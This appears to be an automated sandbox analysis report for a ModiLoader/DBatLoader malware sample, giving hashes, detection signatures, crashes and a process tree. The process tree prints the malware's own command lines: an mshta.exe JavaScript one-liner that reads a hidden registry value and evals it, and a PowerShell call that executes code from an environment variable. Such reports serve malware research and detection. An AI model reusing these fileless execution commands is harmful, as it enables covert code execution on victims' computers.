Analysis
-
max time kernel
140s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 12:07
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_6c8276aa406aad1f2f02706d98ab2b5a.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_6c8276aa406aad1f2f02706d98ab2b5a.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_6c8276aa406aad1f2f02706d98ab2b5a.exe
-
Size
433KB
-
MD5
6c8276aa406aad1f2f02706d98ab2b5a
-
SHA1
c62d46e3f99499d74ff07d5b41977d78fae9ad2d
-
SHA256
40ab6fa51eff15e766399d0d6a48960708e3c382cb5e65184838a22b213c209c
-
SHA512
48d9d95206f528ea405e67a2e68be7f5f291b2bd68fb5f17d0c295d270ed1a67fbf9ef484d1127f96636add47796ca78d6c89a89cc4623805f5886b7014660ec
-
SSDEEP
6144:GtU8o1I8vYJxuufZGTgBVZZlF1T3D16P1hWFlF320ONCC7h486I:GtUp1tvYJpfjvlF1TEP+lFvKh4W
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3960 2136 mshta.exe 107 -
ModiLoader Second Stage 8 IoCs
resource yara_rule behavioral2/memory/4220-3-0x0000000000400000-0x0000000000472000-memory.dmp modiloader_stage2 behavioral2/memory/4220-5-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/4220-6-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/4220-9-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/4220-8-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/4220-7-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/4220-10-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/4220-31-0x0000000000400000-0x0000000000472000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation mshta.exe -
pid Process 4004 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 2608 4220 WerFault.exe 82 2436 4220 WerFault.exe 82 392 4220 WerFault.exe 82 4392 4220 WerFault.exe 82 1756 4220 WerFault.exe 82 2520 4220 WerFault.exe 82 3268 4220 WerFault.exe 82 1584 4220 WerFault.exe 82 4068 4220 WerFault.exe 82 4296 4220 WerFault.exe 82 1840 4220 WerFault.exe 82 2400 4220 WerFault.exe 82 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_6c8276aa406aad1f2f02706d98ab2b5a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4004 powershell.exe 4004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4004 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3960 wrote to memory of 4004 3960 mshta.exe 110 PID 3960 wrote to memory of 4004 3960 mshta.exe 110 PID 3960 wrote to memory of 4004 3960 mshta.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c8276aa406aad1f2f02706d98ab2b5a.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_6c8276aa406aad1f2f02706d98ab2b5a.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4220 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 6362⤵
- Program crash
PID:2608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 6402⤵
- Program crash
PID:2436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 7242⤵
- Program crash
PID:392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 7322⤵
- Program crash
PID:4392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 7922⤵
- Program crash
PID:1756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 7602⤵
- Program crash
PID:2520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 8122⤵
- Program crash
PID:3268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 8202⤵
- Program crash
PID:1584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 9682⤵
- Program crash
PID:4068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 9682⤵
- Program crash
PID:4296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 9682⤵
- Program crash
PID:1840
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 10562⤵
- Program crash
PID:2400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4220 -ip 42201⤵PID:2924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4220 -ip 42201⤵PID:2860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4220 -ip 42201⤵PID:3060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4220 -ip 42201⤵PID:1888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4220 -ip 42201⤵PID:1496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4220 -ip 42201⤵PID:964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4220 -ip 42201⤵PID:1064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4220 -ip 42201⤵PID:3852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4220 -ip 42201⤵PID:3376
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4220 -ip 42201⤵PID:2312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4220 -ip 42201⤵PID:448
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:iPmhhw3="nn";P5E0=new%20ActiveXObject("WScript.Shell");DL4ZVWu="MQxntIKI";iTbH4=P5E0.RegRead("HKLM\\software\\Wow6432Node\\KMsRdZH6u\\8CqFo9u3nz");mgF7nha5fH="IVCNtg";eval(iTbH4);y0ubMbn8="19jVWTyG";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:jwdfka2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4220 -ip 42201⤵PID:4460
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82